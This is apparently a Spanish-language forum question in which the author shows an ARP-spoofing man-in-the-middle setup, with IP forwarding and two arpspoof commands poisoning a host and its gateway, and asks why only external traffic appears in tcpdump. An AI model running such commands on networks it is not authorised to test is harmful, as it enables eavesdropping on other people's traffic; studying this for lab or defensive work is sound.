Estoy intentando realizar un ataque MITM a través de la falsificación ARP para detectar el tráfico de 10.0.0.54
a 10.0.0.55
. Aquí está mi configuración:
echo 1 > /proc/sys/net/ipv4/ip_forward
sudo arpspoof -i wlan0 -t 10.0.0.54 10.0.0.1
sudo arpspoof -i wlan0 -t 10.0.0.1 10.0.0.54
Mi conocimiento es que esto captura todo el tráfico de 10.0.0.54
. Sin embargo, según mi análisis de tcpdump
, solo estoy capturando tráfico externo (cualquier dirección IP pública) y no capturando tráfico interno (direcciones IP privadas).
¿Puede alguien decirme por qué este sería el caso? ¿Debo enviar mis solicitudes de ARP a otro lado?